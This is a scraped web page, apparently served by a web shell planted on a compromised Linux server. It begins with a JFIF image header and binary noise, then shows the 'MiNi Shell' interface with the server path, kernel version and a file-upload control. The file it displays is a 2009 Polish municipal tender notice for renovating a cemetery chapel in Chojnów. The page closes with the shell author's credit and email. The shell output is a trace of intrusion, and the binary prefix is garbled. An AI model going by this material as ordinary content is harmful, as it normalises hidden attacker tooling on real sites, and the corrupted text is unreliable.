JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090204/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090204/17648-N-2009.html

<p class="kh_header"><b>Chojnów: Modernizację kaplicy na Cmentarzu Komunalnym w Chojnowie.</b><br>
<b>Numer ogłoszenia: 17648 - 2009; data zamieszczenia: 04.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Chojnowie , Pl. Zamkowy 1, 59-225 Chojnów, woj. dolnośląskie, tel. 076 8187840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chojnow.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizację kaplicy na Cmentarzu Komunalnym w Chojnowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest modernizacja kaplicy na Cmentarzu Komunalnym w Chojnowie 
2.	Przedmiot zamówienia obejmuje:
2.1. 	Roboty rozbiórkowe:
-	wyburzenie ścianki działowej przesłaniającej drewnianą emporę;
-	zbicie tynków na ścianie wschodniej nawy (mozaika z kamieni);
-	wyburzenie katafalku, rozbiórka posadzki w nawie i absydzie;
-	usunięcie starych przemalowań olejnych stropu kasetonowego, empory oraz drzwi portalu i drzwi wieży.
2.2.	Roboty renowacyjne:
-	przełożenie i renowacja kamiennych stopni portalu;
-	uzupełnienie stolarki stropu kasetonowego, empory i drzwi, malowanie elementów drewnianych, naprawa okien i żaluzji wieży;
-	oczyszczenie i pomalowanie metalowych ram okiennych wraz z ramkami zabezpieczającymi witraże i wmontowanie siatek stalowych;
-	uzupełnienie tynków i malowanie wnętrza farbami akrylowymi w/g uzgodnionej kolorystyki.
2.3	Estetyzacja i aranżacja wnętrza:
-	wykonanie ścianki działowej z płyt g-k za słupami empory z montażem drzwi drewnianych dwuskrzydłowych z naświetlem;
-	ułożenie posadzki granitowej w nawie oraz z piaskowca naturalnego w absydzie;
2.4.	Roboty elektryczne:
-	wykonanie wewnętrznej instalacji elektrycznej;
-	wykonanie instalacji nagłaśniającej.

3.	Warunki wykonania zamówienia:
-	Zamówienie powinno być wykonane w nieprzekraczalnym terminie do 31.08.2009r. 
-	Wymagany okres gwarancji na wykonane roboty ( materiały i robociznę) wynosi 
5 lat od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.
-	Wykonawca obowiązany jest dołączyć certyfikaty zgodności lub deklaracje zgodności z Polską Normą lub aprobatą techniczną dla użytych materiałów i urządzeń.
-	Wszystkie roboty muszą odpowiadać Polskim Normom Branżowym oraz Warunkom Technicznym Wykonania i Odbioru Robót Budowlanych

Przedmiar robót oraz projekt budowlany zawarty jest w Rozdziale F niniejszej specyfikacji. Proponuje się Wykonawcom przeprowadzenie wizji w terenie przed złożeniem oferty..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest obowiązany przed złożeniem oferty wnieść wadium w wysokości:  1 500,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.1 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 	określone w art. 22 ust. 1 pkt. 1-3 ustawy Pzp, tj.: 

1)	posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia 	działalności lub czynności; 

2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 	technicznym i osobami zdolnymi do wykonania zamówienia lub  przedstawiają 	pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego 	i osób zdolnych do wykonania zamówienia, tj:
	
	a) wykonali w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie 	zamówienia tj. przed dniem 04.02.2009 r., a jeżeli okres prowadzenia działalności jest 	krótszy - w tym okresie, wykonali co najmniej dwie roboty budowlane 	odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot 	zamówienia (roboty remontowo-renowacyjne, instalacje elektryczne wewnętrzne), 
	z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania (wzór stanowi 	Załącznik Nr 4 do SIWZ). Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (np. referencje, itp.)
	
b) dysponują osobą-osobami  posiadającą-posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalnościach: 1) konstrukcyjno-budowlanej, 2) instalacyjnej w zakresie instalacji elektrycznych.
Wykonawca zobowiązany jest dołączyć do oferty kserokopię, potwierdzoną 
	za zgodność z oryginałem, takich  uprawnień oraz zaświadczenie, wydane przez 	właściwą izbę samorządu zawodowego, potwierdzające wpis danej osoby na listę 	członków właściwej izby. 

3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie   	zamówienia, tj: posiadają polisę lub inny dokument ubezpieczenia potwierdzajacy, że Wykonawca jest 	ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 	gospodarczej. 

4) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień 	publicznych.
1.2 Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 	spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach 	i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) 	dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać 	jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.
1.3	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli 	oświadczeń i dokumentów potwierdzających spełnianie warunków udziału 	w postępowaniu lub, którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane 	oświadczenia i dokumenty zawierające błędy, lub którzy złożyli wadliwe 	pełnomocnictwa, do ich złożenia w wyznaczonym terminie chyba, że mimo ich 	złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie 	postępowania. 
1.4	Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny 	potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz 	spełnienie przez oferowane usługi wymagania określone przez Zamawiającego, nie 	później niż w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 1 oraz Załącznik Nr 2 do niniejszej SIWZ.

2 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej,  wystawione nie wcześniej niż 6 miesięcy 	przed upływem terminu składania ofert. 

3.Wykaz wykonanych robót budowlanych (co najmniej dwóch) w okresie ostatnich pięciu lat przed dniem 	wszczęcia postępowania o udzielenie zamówienia publicznego, tj.: przed dniem 04.02.2009 r., a jeżeli okres prowadzenia 	działalności jest krótszy - w tym okresie, 	odpowiadających swoim rodzajem 	robotom budowlanym stanowiącym przedmiot 	zamówienia (roboty remontowo-	renowacyjne, instalacje elektryczne wewnętrzne), z podaniem ich wartości, przedmiotu 	oraz daty i miejsca wykonania - wzór stanowi 	Załącznik Nr 4 do niniejszej 	SIWZ. Dla każdej pozycji wykazu należy załaczyć 	dokumenty (referencje, itp.) 	potwierdzające, że roboty te zostały wykonane należycie.

4.Wykaz osób (kadry technicznej), którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu niniejszego zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnych do 	wykonania zamówienia, a także zakresu wykonanych przez nich czynności.
	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do 	wykonania zamówienia, jeżeli w wykazie, o którym mowa wyżej, Wykonawca 	wskazał osoby, którymi będzie dysponował.
5. Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest 	ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 	gospodarczej. Przy składaniu ofert przez Wykonawców wspólnie ubiegających się 
	o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę 	potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności 	cywilnej w zakresie prowadzonej działalności gospodarczej.
	
UWAGA !
Wykonawca zobowiązany jest do złożenia dokumentów na potwierdzenie spełnienia warunków udziału w postępowaniu  w formie oryginału lub kserokopii poświadczonej  za zgodność z oryginałem przez Wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.chojnow.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Chojnowie, Pl. Zamkowy 1, 59-225 Chojnów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2009 godzina 09:00, miejsce: Urząd Miejski w Chojnowie, Pl. Zamkowy 1, 59-225 Chojnów, I - piętro pok. nr 6
(sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> do 26.03.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com